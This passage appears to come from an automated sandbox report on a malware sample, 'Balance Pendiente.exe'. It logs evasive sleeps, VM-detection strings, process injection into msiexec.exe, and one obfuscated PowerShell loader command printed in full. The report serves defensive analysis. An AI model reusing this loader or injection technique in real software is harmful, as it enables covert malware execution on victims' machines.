            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598469s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -598114s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597864s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597740s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597471s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595353s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595094s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594978s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405E6B FindFirstFileA,FindClose,0_2_00405E6B
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405427
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598114Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597864Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597740Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597471Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595353Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594978Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\dq
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\dq
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\dq
            Source: msiexec.exe, 00000006.00000002.2981936990.0000000006334000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000006.00000002.2981936990.0000000006334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Balance Pendiente.exeAPI call chain: ExitProcess graph end nodegraph_0-3894
            Source: C:\Users\user\Desktop\Balance Pendiente.exeAPI call chain: ExitProcess graph end nodegraph_0-3755
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00ADDAC0 LdrInitializeThunk,1_2_00ADDAC0
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_100010D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
